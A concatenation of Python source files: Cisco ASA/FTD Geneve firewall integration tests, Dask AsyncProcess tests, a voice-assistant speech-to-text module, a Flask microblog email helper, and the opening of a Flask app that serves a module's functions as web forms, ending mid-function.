f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m sudo iperf -s -u\''"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo iperf -c {app_ip} -u;'"
res = os.popen(cmd2).read()
print("Iperf result:\n", res)
bd = re.compile(" ([\d.]+?) (?=MBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill iperf\''"
os.popen(cmd3).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDiperftcp
def test_iperf_tcp_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo screen -d -m sudo iperf -s'"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo iperf -c {app_jb_ip}\''"
res = os.popen(cmd2).read()
print(res)
try:
bd = re.compile(" ([\d.]+?) (?=MBytes)").findall(res)[0]
except:
bd = re.compile(" ([\d.]+?) (?=GBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill iperf'"
os.popen(cmd3).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDiperftcpreverse
def test_iperf_tcp_reverse_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m sudo iperf -s\''"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo iperf -c {app_ip}'"
res = os.popen(cmd2).read()
print("Iperf result:\n", res)
try:
bd = re.compile(" ([\d.]+?) (?=MBytes)").findall(res)[0]
except:
bd = re.compile(" ([\d.]+?) (?=GBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill iperf\''"
os.popen(cmd3).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDcounter
def test_udp_counter_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "clear asp drop"
cmd2 = "show asp drop frame geneve-invalid-udp-checksum"
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
ftd_config(ftd_address, cmd1)
send(IP(dst="20.0.1.102") / UDP(sport=20001, dport=6081, chksum=0) / b'\x08\x00\x08')
_, res = ftd_config(ftd_address, cmd2)
assert "geneve-invalid-udp-checksum" in res
@pytest.mark.geneveFTD
@pytest.mark.FTDreset
def test_tcp_counter_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd = f"ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m ssh root@{asa_jb_ip}\''"
os.popen(cmd).read()
cmd2 = "clear conn address 10.0.1.101"
cmd3 = "show asp drop"
cmd1 = "clear asp drop"
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
ftd_config(ftd_address, cmd1)
ftd_config(ftd_address, cmd2)
cmd = f"ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill screen\''"
os.popen(cmd).read()
_, res = ftd_config(ftd_address, cmd3)
assert "tcp-not-syn" in res
@pytest.mark.geneveFTD
@pytest.mark.FTDlogserver
def test_log_server_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
config = '''
logging enable
logging buffer-size 52428800
logging buffered debugging
logging trap debugging
logging host data-interface 20.0.1.10
logging message 302020
'''
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
ftd_config(ftd_address, config)
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh2 = paramiko.SSHClient()
ssh2.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
ssh2.connect(asa_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
_, stdout, _ = ssh2.exec_command("sudo ifconfig eth1 down;sudo ifconfig eth1 20.0.1.10/24;sudo ifconfig eth1 up")
stdout.channel.recv_exit_status()
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 10'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "0% packet loss" in resp1
_, stdout, _ = ssh2.exec_command("sudo systemctl restart syslog")
stdout.channel.recv_exit_status()
while True:
_, stdout, _ = ssh2.exec_command("tail -n 100 /var/log/syslog")
stdout.channel.recv_exit_status()
resp2 = "".join(stdout.readlines())
if not resp2:
continue
else:
break
assert "8.8.8.8" in resp2
ssh.close()
ssh2.close()
@pytest.mark.geneveFTD
@pytest.mark.FTDgenevedebug
def test_debug_geneve_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "debug geneve encapsulation"
cmd2 = "debug geneve encapsulation 4"
cmd3 = "debug geneve decapsulation"
cmd4 = "debug geneve decapsulation 4"
cmd5 = "debug geneve all"
cmd_clean = "unde all"
cmd_show = "show debug"
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
import pexpect
conn = pexpect.spawn(ftd_address)
Ocean_reply(conn)
go2ftd(conn)
conn.sendline("en")
Ocean_reply(conn)
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve" not in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd1)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve encapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd2)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve encapsulation enabled at level 4" in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd3)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve decapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd4)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve decapsulation enabled at level 4" in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd5)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve encapsulation enabled at level 1" in res
assert "debug geneve decapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve" not in res
conn.close()
del conn
@pytest.mark.geneveFTD
@pytest.mark.FTDstatistics
def test_stats_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "show interface vni 1"
cmd2 = "show nve 1"
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
_, cont1_1 = ftd_config(ftd_address, cmd1)
_, cont2_1 = ftd_config(ftd_address, cmd2)
p1 = "(.*) packets input"
p2 = "(.*) packets output"
output_cmd1_1 = int(re.compile(p1).findall(cont1_1)[0])
output_cmd2_1 = int(re.compile(p2).findall(cont2_1)[0])
test_Basic_PingGoogle_FTD(local_run)
_, cont1_2 = ftd_config(ftd_address, cmd1)
_, cont2_2 = ftd_config(ftd_address, cmd2)
output_cmd1_2 = int(re.compile(p1).findall(cont1_2)[0])
output_cmd2_2 = int(re.compile(p2).findall(cont2_2)[0])
assert output_cmd1_2 > output_cmd1_1
assert output_cmd2_2 > output_cmd2_1
@pytest.mark.geneveFTD
@pytest.mark.FTDcapture
def test_capture_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd0 = "no capture g"
cmd1 = "clear cap /all"
cmd2 = "cap g int ge trace"
cmd3 = "show capture g | in icmp: echo request"
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
ftd_config(ftd_address, cmd0)
ftd_config(ftd_address, cmd1)
ftd_config(ftd_address, cmd2)
test_Basic_PingGoogle_FTD(local_run)
time.sleep(1)
_, cont3 = ftd_config(ftd_address, cmd3)
pNum = int(re.compile("\d+: ").findall(cont3)[0].strip().split(":")[0])
cmd4 = f"show capture g trace packet-number {pNum} | in Action:"
cmd5 = "no capture g"
_, cont4 = ftd_config(ftd_address, cmd4)
assert "Action: allow" in cont4
ftd_config(ftd_address, cmd5)
@pytest.mark.updowngrade
def test_image_replacement(keyFile, trs):
print("keyFile::", keyFile)
print("Debug::", trs)
obj = aws(record=False)
res1 = obj.blind("Test-1-169-EC2-ASA", "EC2INSTANCE")
res2 = res = obj.blind("Test-1-169-EC2-ASA-JB", "EC2INSTANCE")
# backup config in ASA
cmd = "show run"
asa_address = f"ssh -i 'testDog.pem' admin@{res1['public_ip']}"
old_config = asa_config(asa_address, cmd)
assert old_config != ""
# transfer image to asa
new_image = "geneve_new.smp"
command = f"scp -i {keyFile} -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"{new_image} ubuntu@{res2['public_ip']}:/var/www/html/."
timer("start")
os.popen(command).read()
timer("stop")
import pexpect
debug = trs
conn = pexpect.spawn(asa_address)
conn, result, cont = Geneve_reply(conn)
conn.sendline("en")
conn, result, cont = Geneve_reply(conn)
print("debug:start copy")
conn.sendline("copy http://20.0.250.10/geneve_new.smp disk0:/geneve_new.smp")
conn, result, cont = Geneve_reply(conn, timeout=120, debug=debug)
print("debug:end copy")
# print old version
conn.sendline("show version")
conn, result, cont = Geneve_reply(conn, timeout=120, debug=debug)
print("Old Version::", cont)
# reload asa
conn.sendline("boot system disk0:/geneve_new.smp")
conn, result, cont = Geneve_reply(conn)
conn.sendline("reload")
conn, result, cont = Geneve_reply(conn, debug=debug)
print('WAITED', wait(600))
conn.close();
del conn
# print new version
conn = pexpect.spawn(asa_address)
conn, result, cont = Geneve_reply(conn)
conn.sendline("en")
conn, result, cont = Geneve_reply(conn)
conn.sendline("show version")
conn, result, cont = Geneve_reply(conn, timeout=120, debug=debug)
print("New Version::", cont)
# config is same as before/after
cmd = "show run"
asa_address = f"ssh -i 'testDog.pem' admin@{res['public_ip']}"
new_config = asa_config(asa_address, cmd)
temp = new_config.replace("geneve_new.smp", "geneve.smp")
assert temp == old_config
pass
if __name__ == '__main__':
pytest.main(["-q", "-s", "-ra", "test_geneve.py"])
# capture abc interface data-interface
# show capture abc packet-number 18 detail decode
#
# copy /pcap capture:abc abc.pcap
#
# copy disk0:/abc.pcap scp://root@1.2.3.4:/home/ubuntu/.
#######################
# access-list geneve extended permit icmp host 3.101.116.24 host 10.0.1.101
# access-list geneve extended permit tcp host 3.101.116.24 host 10.0.1.101
# access-list geneve extended permit udp host 3.101.116.24 host 10.0.1.101
#######################
# direct vs roundway
# aaa authentication listener http data-interface port www
# ~~~~exclusive~~~~
# object network gwlb-net
# subnet 20.0.1.0 255.255.255.0
#
# object-group network gwlb
# network-object object gwlb-net
#
# object-group network metadata
# network-object host 20.0.1.10
#
# object service http80
# service tcp destination eq www
#
# nat (data-interface,data-interface) source static gwlb interface destination static interface metadata service http80 http80
#
|
test_asyncprocess.py
|
import asyncio
import gc
import os
import signal
import sys
import threading
import weakref
from datetime import timedelta
from time import sleep
import pytest
from tornado import gen
from tornado.locks import Event
from distributed.compatibility import WINDOWS
from distributed.metrics import time
from distributed.process import AsyncProcess
from distributed.utils import mp_context
from distributed.utils_test import gen_test, nodebug, pristine_loop
def feed(in_q, out_q):
obj = in_q.get(timeout=5)
out_q.put(obj)
def exit(q):
sys.exit(q.get())
def exit_now(rc=0):
sys.exit(rc)
def exit_with_signal(signum):
signal.signal(signal.SIGINT, signal.SIG_DFL)
while True:
os.kill(os.getpid(), signum)
sleep(0.01)
def wait():
while True:
sleep(0.01)
def threads_info(q):
q.put(len(threading.enumerate()))
q.put(threading.current_thread().name)
@nodebug
@gen_test()
async def test_simple():
to_child = mp_context.Queue()
from_child = mp_context.Queue()
proc = AsyncProcess(target=feed, args=(to_child, from_child))
assert not proc.is_alive()
assert proc.pid is None
assert proc.exitcode is None
assert not proc.daemon
proc.daemon = True
assert proc.daemon
wr1 = weakref.ref(proc)
wr2 = weakref.ref(proc._process)
# join() before start()
with pytest.raises(AssertionError):
await proc.join()
await proc.start()
assert proc.is_alive()
assert proc.pid is not None
assert proc.exitcode is None
t1 = time()
await proc.join(timeout=0.02)
dt = time() - t1
assert 0.2 >= dt >= 0.01
assert proc.is_alive()
assert proc.pid is not None
assert proc.exitcode is None
# setting daemon attribute after start()
with pytest.raises(AssertionError):
proc.daemon = False
to_child.put(5)
assert from_child.get() == 5
# child should be stopping now
t1 = time()
await proc.join(timeout=30)
dt = time() - t1
assert dt <= 1.0
assert not proc.is_alive()
assert proc.pid is not None
assert proc.exitcode == 0
# join() again
t1 = time()
await proc.join()
dt = time() - t1
assert dt <= 0.6
del proc
gc.collect()
start = time()
while wr1() is not None and time() < start + 1:
# Perhaps the GIL switched before _watch_process() exit,
# help it a little
sleep(0.001)
gc.collect()
if wr1() is not None:
# Help diagnosing
from types import FrameType
p = wr1()
if p is not None:
rc = sys.getrefcount(p)
refs = gc.get_referrers(p)
del p
print("refs to proc:", rc, refs)
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("AsyncProcess should have been destroyed")
t1 = time()
while wr2() is not None:
await asyncio.sleep(0.01)
gc.collect()
dt = time() - t1
assert dt < 2.0
@gen_test()
async def test_exitcode():
q = mp_context.Queue()
proc = AsyncProcess(target=exit, kwargs={"q": q})
proc.daemon = True
assert not proc.is_alive()
assert proc.exitcode is None
await proc.start()
assert proc.is_alive()
assert proc.exitcode is None
q.put(5)
await proc.join(timeout=30)
assert not proc.is_alive()
assert proc.exitcode == 5
@pytest.mark.skipif(WINDOWS, reason="POSIX only")
@gen_test()
async def test_signal():
proc = AsyncProcess(target=exit_with_signal, args=(signal.SIGINT,))
proc.daemon = True
assert not proc.is_alive()
assert proc.exitcode is None
await proc.start()
await proc.join(timeout=30)
assert not proc.is_alive()
# Can be 255 with forkserver, see https://bugs.python.org/issue30589
assert proc.exitcode in (-signal.SIGINT, 255)
proc = AsyncProcess(target=wait)
await proc.start()
os.kill(proc.pid, signal.SIGTERM)
await proc.join(timeout=30)
assert not proc.is_alive()
assert proc.exitcode in (-signal.SIGTERM, 255)
@gen_test()
async def test_terminate():
proc = AsyncProcess(target=wait)
proc.daemon = True
await proc.start()
await proc.terminate()
await proc.join(timeout=30)
assert not proc.is_alive()
assert proc.exitcode in (-signal.SIGTERM, 255)
@gen_test()
async def test_close():
proc = AsyncProcess(target=exit_now)
proc.close()
with pytest.raises(ValueError):
await proc.start()
proc = AsyncProcess(target=exit_now)
await proc.start()
proc.close()
with pytest.raises(ValueError):
await proc.terminate()
proc = AsyncProcess(target=exit_now)
await proc.start()
await proc.join()
proc.close()
with pytest.raises(ValueError):
await proc.join()
proc.close()
@gen_test()
async def test_exit_callback():
to_child = mp_context.Queue()
from_child = mp_context.Queue()
evt = Event()
# FIXME: this breaks if changed to async def...
@gen.coroutine
def on_stop(_proc):
assert _proc is proc
yield gen.moment
evt.set()
# Normal process exit
proc = AsyncProcess(target=feed, args=(to_child, from_child))
evt.clear()
proc.set_exit_callback(on_stop)
proc.daemon = True
await proc.start()
await asyncio.sleep(0.05)
assert proc.is_alive()
assert not evt.is_set()
to_child.put(None)
await evt.wait(timedelta(seconds=3))
assert evt.is_set()
assert not proc.is_alive()
# Process terminated
proc = AsyncProcess(target=wait)
evt.clear()
proc.set_exit_callback(on_stop)
proc.daemon = True
await proc.start()
await asyncio.sleep(0.05)
assert proc.is_alive()
assert not evt.is_set()
await proc.terminate()
await evt.wait(timedelta(seconds=3))
assert evt.is_set()
@gen_test()
async def test_child_main_thread():
"""
The main thread in the child should be called "MainThread".
"""
q = mp_context.Queue()
proc = AsyncProcess(target=threads_info, args=(q,))
await proc.start()
await proc.join()
n_threads = q.get()
main_name = q.get()
assert n_threads <= 3
assert main_name == "MainThread"
q.close()
q._reader.close()
q._writer.close()
@pytest.mark.skipif(
sys.platform.startswith("win"), reason="num_fds not supported on windows"
)
@gen_test()
async def test_num_fds():
psutil = pytest.importorskip("psutil")
# Warm up
proc = AsyncProcess(target=exit_now)
proc.daemon = True
await proc.start()
await proc.join()
p = psutil.Process()
before = p.num_fds()
proc = AsyncProcess(target=exit_now)
proc.daemon = True
await proc.start()
await proc.join()
assert not proc.is_alive()
assert proc.exitcode == 0
start = time()
while p.num_fds() > before:
await asyncio.sleep(0.1)
print("fds:", before, p.num_fds())
assert time() < start + 10
@gen_test()
async def test_terminate_after_stop():
proc = AsyncProcess(target=sleep, args=(0,))
await proc.start()
await asyncio.sleep(0.1)
await proc.terminate()
def _worker_process(worker_ready, child_pipe):
# child_pipe is the write-side of the children_alive pipe held by the
# test process. When this _worker_process exits, this file descriptor should
# have no references remaining anywhere and be closed by the kernel. The
# test will therefore be able to tell that this process has exited by
# reading children_alive.
# Signal to parent process that this process has started and made it this
# far. This should cause the parent to exit rapidly after this statement.
worker_ready.set()
# The parent exiting should cause this process to os._exit from a monitor
# thread. This sleep should never return.
shorter_timeout = 2.5 # timeout shorter than that in the spawning test.
sleep(shorter_timeout)
# Unreachable if functioning correctly.
child_pipe.send("child should have exited by now")
def _parent_process(child_pipe):
"""Simulate starting an AsyncProcess and then dying.
The child_alive pipe is held open for as long as the child is alive, and can
be used to determine if it exited correctly."""
async def parent_process_coroutine():
worker_ready = mp_context.Event()
worker = AsyncProcess(target=_worker_process, args=(worker_ready, child_pipe))
await worker.start()
# Wait for the child process to have started.
worker_ready.wait()
# Exit immediately, without doing any process teardown (including atexit
# and 'finally:' blocks) as if by SIGKILL. This should cause
# worker_process to also exit.
os._exit(255)
with pristine_loop() as loop:
try:
loop.run_sync(parent_process_coroutine, timeout=10)
finally:
loop.stop()
raise RuntimeError("this should be unreachable due to os._exit")
def test_asyncprocess_child_teardown_on_parent_exit():
r"""Check that a child process started by AsyncProcess exits if its parent
exits.
The motivation is to ensure that if an AsyncProcess is created and the
creator process dies unexpectedly (e.g, via Out-of-memory SIGKILL), the
child process and resources held by it should not be leaked.
The child should monitor its parent and exit promptly if the parent exits.
[test process] -> [parent using AsyncProcess (dies)] -> [worker process]
\ /
\________ <-- child_pipe <-- ________/
"""
# When child_pipe is closed, the children_alive pipe unblocks.
children_alive, child_pipe = mp_context.Pipe(duplex=False)
try:
parent = mp_context.Process(target=_parent_process, args=(child_pipe,))
parent.start()
# Close our reference to child_pipe so that the child has the only one.
child_pipe.close()
# Wait for the parent to exit. By the time join returns, the child
# process is orphaned, and should be in the process of exiting by
# itself.
parent.join()
# By the time we reach here,the parent has exited. The parent only exits
# when the child is ready to enter the sleep, so all of the slow things
# (process startup, etc) should have happened by now, even on a busy
# system. A short timeout should therefore be appropriate.
short_timeout = 5.0
# Poll is used to allow other tests to proceed after this one in case of
# test failure.
try:
readable = children_alive.poll(short_timeout)
except BrokenPipeError:
assert sys.platform.startswith("win"), "should only raise on windows"
# Broken pipe implies closed, which is readable.
readable = True
# If this assert fires, then something went wrong. Either the child
# should write into the pipe, or it should exit and the pipe should be
# closed (which makes it become readable).
assert readable
try:
# This won't block due to the above 'assert readable'.
result = children_alive.recv()
except EOFError:
pass # Test passes.
except BrokenPipeError:
assert sys.platform.startswith("win"), "should only raise on windows"
# Test passes.
else:
# Oops, children_alive read something. It should be closed. If
# something was read, it's a message from the child telling us they
# are still alive!
raise RuntimeError(f"unreachable: {result}")
finally:
# Cleanup.
children_alive.close()
|
stt.py
|
"""
**Speech to Text (STT) engine**
Converts the user speech (audio) into text.
"""
import threading
import traceback
import speech_recognition as sr
from src import settings
from src.core.modules import log, tts, replying
def setup() -> None:
"""
Initializes the STT engine
Steps:
1. Creates a new `Recognizer` object
2. Configures the energy threshold
"""
global recognizer
recognizer = sr.Recognizer()
recognizer.dynamic_energy_threshold = False
recognizer.energy_threshold = settings.SR_ENERGY_THRESHOLD
def listen() -> sr.AudioData:
"""
Listens for user input (voice) and returns it
Returns:
sr.AudioData: The raw input data
"""
with sr.Microphone() as raw_microphone_input:
log.debug("Listening to ambient...")
audio = recognizer.listen(raw_microphone_input)
return audio
def recognize(audio: sr.AudioData) -> str:
"""
Transcribes human voice data from a `AudioData` object (from `listen`)
Args:
audio (sr.AudioData): The raw audio data from the user
Returns:
str: A sentence/phrase with the user intent
"""
output = None
log.debug("Recognizing audio...")
if settings.STT_ENGINE == "google":
try:
output = recognizer.recognize_google(audio, language=settings.LANGUAGE)
except sr.UnknownValueError:
log.debug("Speech engine could not resolve audio")
except sr.RequestError:
log.error("An error ocurred with the Google services, try again")
except:
traceback.print_exc()
log.error("A unknown error ocurred...")
finally:
return output
def recognize_keyword() -> None:
"""
Listens for the keyword, to activate the assistant.
Steps:
1. Listens for audio from the microphone
2. Recognizes the audio using `gTTS`
3. Checks if the keyword (as in `settings.KEYWORD`) is in the audio data (if True, break loop)
"""
global keyword_detected
global new_process
audio = listen()
new_process = True
log.debug("Recognizing keyword...")
try:
rec_input = recognizer.recognize_google(audio, language=settings.LANGUAGE)
if settings.KEYWORD in rec_input.lower():
log.debug("Keyword detected!")
# stop listening
keyword_detected = True
else:
log.debug("Keyword not detected in '{0}'".format(rec_input))
except sr.UnknownValueError:
log.debug("Speech engine could not resolve audio")
except sr.RequestError:
log.error("An error ocurred with the Google services, try again")
except:
traceback.print_exc()
log.error("A unknown error ocurred...")
def listen_for_keyword() -> bool:
"""
Loops until the keyword is recognized from the user input (from `recognize_keyword`).
Steps:
1. Enters the loop (keyword detection)
2. Creates a new thread (using `recognize_keyword` as target)
3. If the keywork is detected, break the loop and play the activation sound
Returns:
bool: Whether the keyword is recognizes or not. If not, continue the loop.
"""
global keyword_detected
global new_process
log.debug("Keyword loop...")
keyword_detected = False
new_process = True
log.info("Waiting for '{0}'...".format(settings.KEYWORD))
while True:
if keyword_detected:
break
if new_process:
new_process = False
threading.Thread(target=recognize_keyword).start()
tts.play_mp3(settings.ACTIVATION_SOUND_PATH)
return True
def listen_for_binary() -> bool:
"""
Checks if a binary/boolean value (Yes/No) is present in the transcribed audio.
Used in Yes/No questions (e.g. *"Do you want X?"*)
Steps:
1. Listens for audio from the microphone
2. Recognizes the audio using `gTTS`
3. Checks if a boolean value (Yes, No, True, False) is present in the audio data
Returns:
bool: Wheter a boolean value is present in the audio data
"""
yes_reply = replying.get_reply(["stt", "yn_y"], system=True, module=True)
no_reply = replying.get_reply(["stt", "yn_n"], system=True, module=True)
log.info("Waiting for {0} or {1}".format(yes_reply, no_reply))
while True:
audio = listen()
rec_input = recognize(audio)
if rec_input:
if yes_reply in rec_input.lower():
log.debug("'{0}' detected".format(yes_reply))
return True
elif no_reply in rec_input.lower():
log.debug("'{0}' detected".format(no_reply))
return False
else:
log.debug("Not detected binary answer in {0}".format(rec_input))
|
email.py
|
from flask import render_template
from flask_mail import Message
from flask_babel import _
from threading import Thread
from app import app, mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email(_('[Microblog] Reset Your Password'),
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
|
touch_callable.py
|
#!/usr/bin/env python3
import argparse
import datetime
import enum
import importlib.util
import inspect
import os
import logging
import urllib.parse
import pytz
import sys
import typing
import json
import time
import io
from flask import Flask, jsonify, request, send_file, send_from_directory
app = Flask(__name__)
CALLABLES = None
HAS_NEW_MODULE = False
MODULE_PATH = None
LOCALE = "en"
KEEP_WATCHING = True
@app.route("/")
def home():
return send_file("./front-end/build/index.html")
@app.route("/static/css/<path:filename>")
def serve_css(filename):
return send_from_directory("./front-end/build/static/css/", filename)
@app.route("/static/js/<path:filename>")
def serve_js(filename):
return send_from_directory("./front-end/build/static/js/", filename)
@app.route("/manifest.json")
def serve_manifest():
return send_file("./front-end/build/manifest.json")
@app.route("/favicon.ico")
def serve_favicon():
return send_file("./front-end/build/favicon.ico")
@app.route("/logo192.png")
def serve_logo192():
return send_file("./front-end/build/logo192.png")
@app.route("/logo512.png")
def serve_logo512():
return send_file("./front-end/build/logo512.png")
def get_callable_from_module(module):
def annotation_name_or_none(annotation):
if annotation != inspect._empty:
return annotation.__name__
def get_parameter_annotation(annotation):
if issubclass(annotation, enum.Enum):
return "Enum"
return annotation_name_or_none(annotation)
def get_default_value(default):
if default == inspect._empty:
return None
if isinstance(default, enum.Enum):
return default.value
if isinstance(default, (datetime.date, datetime.datetime)):
return default.isoformat()
if isinstance(default, datetime.time):
return default.replace(microsecond=0).isoformat()
return default
def is_support_signature(signature):
for parameter in signature.parameters.values():
if issubclass(parameter.annotation, enum.Enum):
return True
if parameter.annotation not in (
str,
int,
float,
bool,
datetime.datetime,
datetime.date,
datetime.time,
io.BytesIO,
typing.BinaryIO,
):
return False
if parameter.kind in (
inspect.Parameter.VAR_KEYWORD,
inspect.Parameter.VAR_POSITIONAL,
):
return False
return True
def is_required_parameter(parameter):
if parameter.default == inspect._empty:
return True
return False
def get_enum_values(annotation):
if issubclass(annotation, enum.Enum):
return [e.value for e in annotation]
data = []
for callable_name, callable_ in inspect.getmembers(module, inspect.isfunction):
if callable_.__module__ != module.__name__:
continue
full_doc = inspect.getdoc(callable_)
signature = inspect.signature(callable_)
if not is_support_signature(signature):
continue
data.append(
{
"callable_name": callable_name,
"title": full_doc.split()[0] if full_doc else "",
"doc": full_doc,
"source_code": inspect.getsource(callable_),
"return_type": annotation_name_or_none(signature.return_annotation),
"parameters": [
{
"default": get_default_value(parameter.default),
"kind": parameter.kind.name,
"required": is_required_parameter(parameter),
"name": name,
"annotation": get_parameter_annotation(parameter.annotation),
"enum_values": get_enum_values(parameter.annotation),
}
for name, parameter in signature.parameters.items()
],
}
)
return data
def is_required(callable_name, param_name):
global CALLABLES
for callable_info in CALLABLES:
if callable_info["callable_name"] == callable_name:
for param_info in callable_info["parameters"]:
if param_info["name"] == param_name:
return param_info["required"]
@app.route("/module-status", methods=["GET"])
def module_status():
global HAS_NEW_MODULE
return {"has_new": HAS_NEW_MODULE}
@app.route("/reload-module", methods=["POST"])
def reload_module():
global MODULE
global MODULE_PATH
global HAS_NEW_MODULE
global CALLABLES
MODULE = load_module_by_path(MODULE_PATH)
HAS_NEW_MODULE = False
CALLABLES = None
return {"status": "ok"}
@app.route("/callable")
def get_callable():
global CALLABLES
if not CALLABLES:
CALLABLES = get_callable_from_module(MODULE)
return jsonify(CALLABLES)
@app.route("/locale", methods=["GET", "POST"])
def get_locale():
global LOCALE
if request.method == "GET":
return {"locale": LOCALE}
else:
LOCALE = request.json["locale"]
return {"locale": LOCALE}
@app.route("/callable/<string:callable_name>", methods=["POST"])
def run_callable(callable_name):
callable_ = getattr(MODULE, callable_name)
type_casted_parameters = {}
if request.form:
data = json.loads(request.form["json"])
for param_name, file in request.files.items():
file_in_bytes_io = file.stream._file
if isinstance(file.stream._file, io.BufferedRandom):
file_in_bytes_io = io.BytesIO()
file_in_bytes_io.write(file.stream._file.read())
file_in_bytes_io.seek(0)
